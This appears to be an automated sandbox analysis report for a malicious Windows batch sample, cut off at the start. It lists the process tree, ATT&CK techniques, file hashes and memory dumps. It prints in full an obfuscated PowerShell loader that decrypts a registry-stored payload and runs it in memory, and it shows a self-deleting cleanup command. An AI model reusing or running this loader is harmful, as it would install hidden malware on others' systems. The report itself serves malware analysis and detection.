'')('lPeISJ/g7kLbufLxcQYWsU04fcGHjefe80ihx9xLZ30=');$OmgWn1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qijW8aThyI9qYQLHX3RmOA==');$bDukH = $OmgWn1.('rotpyrceDetaerC'[-1..-15] -join '')();$KjvsN = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vIu/qtGS/x2SF+sMWSvDow==');$KjvsN = $bDukH.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KjvsN, 0, $KjvsN.Length);$KjvsN = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KjvsN);$plOkO = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NRF7C23+0Byt9JP09Qn3+DY9RWuWXg3qOZ5asN5y0ws=');$plOkO = $bDukH.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($plOkO, 0, $plOkO.Length);$plOkO = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($plOkO);$BdVPD = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('YazMmludb1vvXcZAwlnHtw==');$BdVPD = $bDukH.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BdVPD, 0, $BdVPD.Length);$BdVPD = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BdVPD);$Khvbp = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zf4gu7ZD/I0b6kn1xVw/lUgWPK+5TZfCSPo5/VhvOXuI85jnbHRoOd2fBY8oxjU26aXQHO2B52J1YA7TfWY3FWExstcJfnODtZBebrQGClVdHebcL2OSattonC3hU321X5S9joWtE4fv8lvmwXH8ZSMbOMFWFESDoOJt+1Bt/H4EOblhpHmooz9fO/Z0BQMWnBbu2ar5V+hEHCESz43Kaxu4hmpzzDEJu+AmLCnK5LBUY45S1drr3J7exCZSxUHJyRziq1L3pwqUI84KLwjoW/k6C5j/KY3rneb2ZEWz9plzz8jRvwboouGn1UIfaUeaBMH1+0BvjxLP3r34OlMXRA5fmStXzraQt7JAdtXUP8wXRdqcOKUQtp52SelQ6J0WjdGAtsvRvQubLio0A+mNT6WMINjpxOSFgujINR8XOic=');$Khvbp = $bDukH.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Khvbp, 0, $Khvbp.Length);$Khvbp = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Khvbp);$OawVc = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MtBl8RDMM8q8D+f38cUwlQ==');$OawVc = $bDukH.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OawVc, 0, $OawVc.Length);$OawVc = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OawVc);$FBZIn = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vWt5Q/a84rfnuBa3yHiejA==');$FBZIn = $bDukH.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($FBZIn, 0, $FBZIn.Length);$FBZIn = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($FBZIn);$AkiHH = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('UavpIk4tpnHdD1kgrI4R2w==');$AkiHH = $bDukH.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($AkiHH, 0, $AkiHH.Length);$AkiHH = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($AkiHH);$fIDaQ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QFB5V6XdocehcH6idKuJ0w==');$fIDaQ = $bDukH.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($fIDaQ, 0, $fIDaQ.Length);$fIDaQ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($fIDaQ);$HMBte = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IzQvJLBl0kmxaMejxpYmTA==');$HMBte = $bDukH.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($HMBte, 0, $HMBte.Length);$HMBte = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($HMBte);$KjvsN0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('8D3dfobAIMj6AYpSV1togQ==');$KjvsN0 = $bDukH.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KjvsN0, 0, $KjvsN0.Length);$KjvsN0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KjvsN0);$KjvsN1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1bVhrF128/BjmNUc1iFP/g==');$KjvsN1 = $bDukH.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KjvsN1, 0, $KjvsN1.Length);$KjvsN1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KjvsN1);$KjvsN2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NKOjM2E+a4FkOdDaJJVE3w==');$KjvsN2 = $bDukH.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KjvsN2, 0, $KjvsN2.Length);$KjvsN2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KjvsN2);$KjvsN3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('oWIK372gtRppDGwBPsAgnQ==');$KjvsN3 = $bDukH.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KjvsN3, 0, $KjvsN3.Length);$KjvsN3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KjvsN3);$bDukH.Dispose();$OmgWn1.Dispose();if (@(get-process -ea silentlycontinue $KjvsN3).count -gt 1) {exit};$FrMqe = [Microsoft.Win32.Registry]::$fIDaQ.$AkiHH($KjvsN).$FBZIn($plOkO);$zSvhR=[string[]]$FrMqe.Split('\');$Odjii=FpgXf(qMEAm([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($zSvhR[1])));qYOzs $Odjii (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$SQOFS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($zSvhR[0]);$OmgWn = New-Object System.Security.Cryptography.AesManaged;$OmgWn.Mode = [System.Security.Cryptography.CipherMode]::CBC;$OmgWn.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$OmgWn.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lPeISJ/g7kLbufLxcQYWsU04fcGHjefe80ihx9xLZ30=');$OmgWn.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qijW8aThyI9qYQLHX3RmOA==');$bzdRW = $OmgWn.('rotpyrceDetaerC'[-1..-15] -join '')();$SQOFS = $bzdRW.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($SQOFS, 0, $SQOFS.Length);$bzdRW.Dispose();$OmgWn.Dispose();$ACvdD = New-Object System.IO.MemoryStream(, $SQOFS);$fxSDY = New-Object System.IO.MemoryStream;$sioSc = New-Object System.IO.Compression.GZipStream($ACvdD, [IO.Compression.CompressionMode]::$KjvsN1);$sioSc.$HMBte($fxSDY);$sioSc.Dispose();$ACvdD.Dispose();$fxSDY.Dispose();$SQOFS = $fxSDY.ToArray();$gZCIb = $Khvbp | IEX;$uGEfN = $gZCIb::$KjvsN2($SQOFS);$lPQfD = $uGEfN.EntryPoint;$lPQfD.$KjvsN0($null, (, [string[]] ($BdVPD)))
        7⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:320
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C PING localhost -n 8 >NUL & taskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\v8pb4a2bgu.bat.exe" & ATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\v8pb4a2bgu.bat.exe" & del /f "C:\Users\Admin\AppData\Local\Temp\v8pb4a2bgu.bat.exe"
        6⤵
        
        PID:4876
        
        C:\Windows\system32\PING.EXE
        
        PING localhost -n 8
        7⤵
        Runs ping.exe
        
        PID:2312

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2476

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2448

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
PID:2376

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
PID:2360

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2288

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2280

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2108

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2088

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:1404

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1944

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1864

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1852

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1824

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1776

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1652

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1620

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1568

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1440

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1428

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1384

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Drops file in System32 directory
PID:1248

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1228

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1056

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1044

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:540

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 428 -p 3428 -ip 3428
1⤵
PID:2712

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 464 -p 3520 -ip 3520
1⤵
PID:4968

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3520 -s 972
1⤵
- Program crash
PID:2264

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3428 -s 392
1⤵
- Program crash
PID:1356

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
feadc4e1a70c13480ef147aca0c47bc0

SHA1
d7a5084c93842a290b24dacec0cd3904c2266819

SHA256
5b4f1fe7ba74b245b6368dbe4ceffa438f14eef08ba270e9a13c57505c7717ac

SHA512
c9681a19c773891808fefa9445cea598d118c83bba89530a51ab993adbff39bce72b43f8e99d0c68e4a44f7e0f4c8ec128641c45cd557a8e1215721d5d992a23

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_iejdnyjz.cy5.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\v8pb4a2bgu.bat

Filesize
15.5MB

MD5
005d53e359262bcbfa0506bae121267a

SHA1
caeb1c9390f33424442ba26a6f251faf6926d7ec

SHA256
f6bee54ceabc6e2afa2b5056b94f71d2e766d5a340fc4245e421f887ea75fb52

SHA512
8cadc53ac3ad7c82d0b6be0c46a88df9301eb6c21f5f7da1b6ab51fa58e0ac5ed44545991b3157dcd8f27db39d5c8abd50e56929c29e7190863c73c81ac640d6

Download Submit
C:\Users\Admin\AppData\Local\Temp\v8pb4a2bgu.bat.exe

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Users\Admin\AppData\Local\Temp\v8pb4a2bgu.bat.exe

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Windows\$sxr-powershell.exe

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Windows\$sxr-powershell.exe

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Windows\$sxr-powershell.exe

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Windows\System32\ucrtbased.dll

Filesize
1.8MB

MD5
7873612dddd9152d70d892427bc45ef0

SHA1
ab9079a43a784471ca31c4f0a34b698d99334dfa

SHA256
203d10b0deaea87d5687d362ba925289a13e52b5df55b9de58ba534290af27bf

SHA512
d988e9ff11017465b019cf3b599ef7597d2c44fc37cbee9e846dee51990ca5dc45942cc183d9d25c1dfd84f33f922c2ceead6efc1ead19e8eecb509dfb78a083

Download Submit
C:\Windows\System32\vcruntime140_1d.dll

Filesize
52KB

MD5
9ef28981adcbf4360de5f11b8f4ecff9

SHA1
219aaa1a617b1dfa36f3928bd1020e410666134f

SHA256
8caaca1bfc909fcb972ceade7be7b80b5855a4621562ee32a10c9903b616d49a

SHA512
ef7f0b25fae749e6134269683f973fef37dfa1969fa4fa0567378ada073c36da4feb17b62d3282c443f4d3ba8b4aeb39063c607c848ade095880d981141adb9c

Download Submit
C:\Windows\System32\vcruntime140d.dll

Filesize
162KB

MD5
a366d6623c14c377c682d6b5451575e6

SHA1
a8894fcfb3aa06ad073b1f581b2e749b54827971

SHA256
7ed89c668d8ec04c1a0a73f35702b8e0d9819e13e6e7c51c4ac0e0abda6683e6

SHA512
cc7da40652209337d2122cafc903d3c11e31b5a37baf2247034e2f3e1de255e58d0e27fc134ce60a6812e6674fd8bc899f2b434dfc1160053f684cf220e6cb11

Download Submit
memory/64-290-0x000001361C4C0000-0x000001361C4E7000-memory.dmp

Filesize
156KB

Download
memory/64-255-0x000001361C4C0000-0x000001361C4E7000-memory.dmp

Filesize
156KB

Download
memory/64-258-0x00007FFAB4630000-0x00007FFAB4640000-memory.dmp

Filesize
64KB

Download
memory/320-216-0x000001DE7CAF0000-0x000001DE7CB00000-memory.dmp

Filesize
64KB

Download
memory/540-266-0x000001431C460000-0x000001431C487000-memory.dmp

Filesize
156KB

Download
memory/540-296-0x000001431C460000-0x000001431C487000-memory.dmp

Filesize
156KB

Download
memory/540-272-0x00007FFAB4630000-0x00007FFAB4640000-memory.dmp

Filesize
64KB

Download
memory/624-257-0x00007FFAB4630000-0x00007FFAB4640000-memory.dmp

Filesize
64KB

Download
memory/624-250-0x0000021B899D0000-0x0000021B899F7000-memory.dmp

Filesize
156KB

Download
memory/624-282-0x0000021B899D0000-0x0000021B899F7000-memory.dmp

Filesize
156KB

Download
memory/624-248-0x0000021B899A0000-0x0000021B899C1000-memory.dmp

Filesize
132KB

Download
memory/680-286-0x000001ACE10F0000-0x000001ACE1117000-memory.dmp

Filesize
156KB

Download
memory/680-252-0x000001ACE10F0000-0x000001ACE1117000-memory.dmp

Filesize
156KB

Download
memory/680-259-0x00007FFAB4630000-0x00007FFAB4640000-memory.dmp

Filesize
64KB

Download
memory/868-276-0x00007FFAB4630000-0x00007FFAB4640000-memory.dmp

Filesize
64KB

Download
memory/868-270-0x0000020334FB0000-0x0000020334FD7000-memory.dmp

Filesize
156KB

Download
memory/868-297-0x0000020334FB0000-0x0000020334FD7000-memory.dmp

Filesize
156KB

Download
memory/956-256-0x0000028820810000-0x0000028820837000-memory.dmp

Filesize
156KB

Download
memory/956-262-0x00007FFAB4630000-0x00007FFAB4640000-memory.dmp

Filesize
64KB

Download
memory/956-294-0x0000028820810000-0x0000028820837000-memory.dmp

Filesize
156KB

Download
memory/1044-279-0x00007FFAB4630000-0x00007FFAB4640000-memory.dmp

Filesize
64KB

Download
memory/1044-274-0x000002CFE3370000-0x000002CFE3397000-memory.dmp

Filesize
156KB

Download
memory/1044-298-0x000002CFE3370000-0x000002CFE3397000-memory.dmp

Filesize
156KB

Download
memory/1056-283-0x0000022F23860000-0x0000022F23887000-memory.dmp

Filesize
156KB

Download
memory/1056-287-0x00007FFAB4630000-0x00007FFAB4640000-memory.dmp

Filesize
64KB

Download
memory/1056-356-0x0000022F23860000-0x0000022F23887000-memory.dmp

Filesize
156KB

Download
memory/1164-284-0x0000023D6FFC0000-0x0000023D6FFE7000-memory.dmp

Filesize
156KB

Download
memory/1164-288-0x00007FFAB4630000-0x00007FFAB4640000-memory.dmp

Filesize
64KB

Download
memory/1164-300-0x0000023D6FFC0000-0x0000023D6FFE7000-memory.dmp

Filesize
156KB

Download
memory/1196-361-0x0000023E4EA80000-0x0000023E4EAA7000-memory.dmp

Filesize
156KB

Download
memory/1228-367-0x0000025182530000-0x0000025182557000-memory.dmp

Filesize
156KB

Download
memory/1248-372-0x0000025833F20000-0x0000025833F47000-memory.dmp

Filesize
156KB

Download
memory/1384-378-0x000001C28F650000-0x000001C28F677000-memory.dmp

Filesize
156KB

Download
memory/1400-215-0x000001F222940000-0x000001F222990000-memory.dmp

Filesize
320KB

Download
memory/1400-208-0x00007FFAF45B0000-0x00007FFAF47A5000-memory.dmp

Filesize
2.0MB

Download
memory/1400-267-0x000001F2231F0000-0x000001F223202000-memory.dmp

Filesize
72KB

Download
memory/1400-230-0x00007FFAF2660000-0x00007FFAF271E000-memory.dmp

Filesize
760KB

Download
memory/1400-229-0x00007FFAF45B0000-0x00007FFAF47A5000-memory.dmp

Filesize
2.0MB

Download
memory/1400-228-0x000001F2228F0000-0x000001F22292C000-memory.dmp

Filesize
240KB

Download
memory/1400-218-0x000001F222CE0000-0x000001F222EA2000-memory.dmp

Filesize
1.8MB

Download
memory/1400-217-0x000001F222A50000-0x000001F222B02000-memory.dmp

Filesize
712KB

Download
memory/1400-299-0x000001F220800000-0x000001F220810000-memory.dmp

Filesize
64KB

Download
memory/1400-350-0x000001F220800000-0x000001F220810000-memory.dmp

Filesize
64KB

Download
memory/1400-268-0x000001F220800000-0x000001F220810000-memory.dmp

Filesize
64KB

Download
memory/1400-207-0x00007FFAF2660000-0x00007FFAF271E000-memory.dmp

Filesize
760KB

Download
memory/1400-203-0x000001F220800000-0x000001F220810000-memory.dmp

Filesize
64KB

Download
memory/1400-273-0x000001F220800000-0x000001F220810000-memory.dmp

Filesize
64KB

Download
memory/1400-206-0x00007FFAF45B0000-0x00007FFAF47A5000-memory.dmp

Filesize
2.0MB

Download
memory/1400-205-0x000001F220800000-0x000001F220810000-memory.dmp

Filesize
64KB

Download
memory/1400-204-0x000001F220800000-0x000001F220810000-memory.dmp

Filesize
64KB

Download
memory/1404-437-0x00000000015D0000-0x00000000015F7000-memory.dmp

Filesize
156KB

Download
memory/1428-381-0x0000020305D30000-0x0000020305D57000-memory.dmp

Filesize
156KB

Download
memory/1440-386-0x000001EDD9680000-0x000001EDD96A7000-memory.dmp

Filesize
156KB

Download
memory/1460-390-0x0000029E41590000-0x0000029E415B7000-memory.dmp

Filesize
156KB

Download
memory/1564-133-0x0000000000C60000-0x0000000000C66000-memory.dmp

Filesize
24KB

Download
memory/1568-395-0x00000191B1F70000-0x00000191B1F97000-memory.dmp

Filesize
156KB

Download
memory/1620-399-0x000002363BE60000-0x000002363BE87000-memory.dmp

Filesize
156KB

Download
memory/1652-404-0x000001B0740E0000-0x000001B074107000-memory.dmp

Filesize
156KB

Download
memory/1708-410-0x000001E236EA0000-0x000001E236EC7000-memory.dmp

Filesize
156KB

Download
memory/1776-417-0x000002442A8B0000-0x000002442A8D7000-memory.dmp

Filesize
156KB

Download
memory/1852-422-0x00000209CC260000-0x00000209CC287000-memory.dmp

Filesize
156KB

Download
memory/1864-426-0x000002CEAAEB0000-0x000002CEAAED7000-memory.dmp

Filesize
156KB

Download
memory/1944-430-0x000001B0BAA00000-0x000001B0BAA27000-memory.dmp

Filesize
156KB

Download
memory/1960-434-0x00000239CE770000-0x00000239CE797000-memory.dmp

Filesize
156KB

Download
memory/2056-179-0x0000000140000000-0x0000000140004000-memory.dmp

Filesize
16KB

Download
memory/2056-181-0x0000000140000000-0x0000000140004000-memory.dmp

Filesize
16KB

Download
memory/2108-442-0x000001E2B6FA0000-0x000001E2B6FC7000-memory.dmp

Filesize
156KB

Download
memory/2360-446-0x000001F596430000-0x000001F596457000-memory.dmp

Filesize
156KB

Download
memory/2376-452-0x000002083E300000-0x000002083E327000-memory.dmp

Filesize
156KB

Download
memory/2476-458-0x000002AEB96F0000-0x000002AEB9717000-memory.dmp

Filesize
156KB

Download
memory/2528-463-0x0000019BCDB90000-0x0000019BCDBB7000-memory.dmp

Filesize
156KB

Download
memory/2536-468-0x0000029378F60000-0x0000029378F87000-memory.dmp

Filesize
156KB

Download
memory/2544-472-0x000001B226460000-0x000001B226487000-memory.dmp

Filesize
156KB

Download
memory/2576-242-0x0000000140000000-0x0000000140028000-memory.dmp

Filesize
160KB

Download
memory/2576-231-0x0000000140000000-0x0000000140028000-memory.dmp

Filesize
160KB

Download
memory/2576-244-0x00007FFAF2660000-0x00007FFAF271E000-memory.dmp

Filesize
760KB

Download
memory/2576-243-0x00007FFAF45B0000-0x00007FFAF47A5000-memory.dmp

Filesize
2.0MB

Download
memory/2576-245-0x0000000140000000-0x0000000140028000-memory.dmp

Filesize
160KB

Download
memory/2616-475-0x00000269CA260000-0x00000269CA287000-memory.dmp

Filesize
156KB

Download
memory/2632-479-0x0000022DDB750000-0x0000022DDB777000-memory.dmp

Filesize
156KB

Download
memory/2852-480-0x00000221A8D30000-0x00000221A8D57000-memory.dmp

Filesize
156KB

Download
memory/2984-484-0x000001BEF70E0000-0x000001BEF7107000-memory.dmp

Filesize
156KB

Download
memory/3176-488-0x0000000002960000-0x0000000002987000-memory.dmp

Filesize
156KB

Download
memory/3344-491-0x0000027051BD0000-0x0000027051BF7000-memory.dmp

Filesize
156KB

Download
memory/4208-146-0x000001EDEE050000-0x000001EDEE060000-memory.dmp

Filesize
64KB

Download
memory/4208-144-0x000001EDEE910000-0x000001EDEE932000-memory.dmp

Filesize
136KB

Download
memory/4208-147-0x000001EDEE050000-0x000001EDEE060000-memory.dmp

Filesize
64KB

Download
memory/4208-145-0x000001EDEE050000-0x000001EDEE060000-memory.dmp

Filesize
64KB

Download
memory/4692-169-0x0000018530F80000-0x0000018530F90000-memory.dmp

Filesize
64KB

Download
memory/4692-171-0x0000018530F80000-0x0000018530F90000-memory.dmp

Filesize
64KB

Download
memory/4692-170-0x0000018530F80000-0x0000018530F90000-memory.dmp

Filesize
64KB

Download
memory/4692-172-0x0000018530F80000-0x0000018530F90000-memory.dmp

Filesize
64KB

Download
memory/4692-168-0x0000018530F80000-0x0000018530F90000-memory.dmp

Filesize
64KB

Download
memory/4692-173-0x0000018530F80000-0x0000018530F90000-memory.dmp

Filesize
64KB

Download
memory/4692-281-0x00007FFAF2660000-0x00007FFAF271E000-memory.dmp

Filesize
760KB

Download
memory/4692-278-0x00007FFAF45B0000-0x00007FFAF47A5000-memory.dmp

Filesize
2.0MB

Download
memory/4692-174-0x00007FFAF45B0000-0x00007FFAF47A5000-memory.dmp

Filesize
2.0MB

Download
memory/4692-175-0x00007FFAF2660000-0x00007FFAF271E000-memory.dmp

Filesize
760KB

Download
memory/4692-177-0x00007FFAF45B0000-0x00007FFAF47A5000-memory.dmp

Filesize
2.0MB

Download